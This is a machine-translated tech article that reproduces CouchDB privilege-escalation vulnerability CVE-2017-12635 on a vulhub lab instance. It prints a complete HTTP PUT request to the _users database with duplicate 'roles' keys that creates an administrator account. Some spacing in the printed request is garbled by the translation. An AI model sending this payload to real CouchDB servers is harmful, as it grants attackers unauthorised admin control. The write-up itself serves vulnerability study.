Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to reproduce the couchdb vertical ultra vires vulnerability CVE-2017-12635. The content of the article is of high quality, so the editor will share it for you to do a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

CouchDB is an open source document-oriented database management system that can be accessed through RESTful JavaScript Object Notation (JSON) API. The term "Couch" is an acronym for "Cluster Of Unreliable Commodity Hardware" and reflects the high scalability of CouchDB's goals, providing high availability and reliability, even on fault-prone hardware.

CVE-2017-12635 is caused by the difference in statement execution due to the different ways of parsing JSON between Erlang and JavaScript. This vulnerability allows any user to create an administrator, belonging to a vertical privilege bypass vulnerability.

The following is only for vulnerability recurrence record and implementation, and the utilization process is as follows:

I. loophole environment

Target link: http://192.168.101.152:5984/

Direct access looks like this.

After visiting http://192.168.101.152:5984/_utils/, it is as follows

Clicking on _ users directly will prompt you that you do not have access to the database.

Second, the utilization process

If the first packet is sent first, a 403 error will be prompted, indicating that only the administrator can set the role

But by sending a packet containing two roles, you can bypass the limit and create an administrator account. Here, an administrator account with both vulhub passwords is created.

PUT / _ users/org.couchdb.user:vulhub HTTP/1.1Host: 192.168.101.152:5984Accept: * / * Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: closeContent-Type: application/jsonContent-Length: 108 {"type": "user", "name": "vulhub", "roles": ["_ admin"], "roles": [], "password": "vulhub"}

Go back to the front desk and log in, and you can already access it.

On the couchdb vertical ultra vires loophole CVE-2017-12635 is how to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.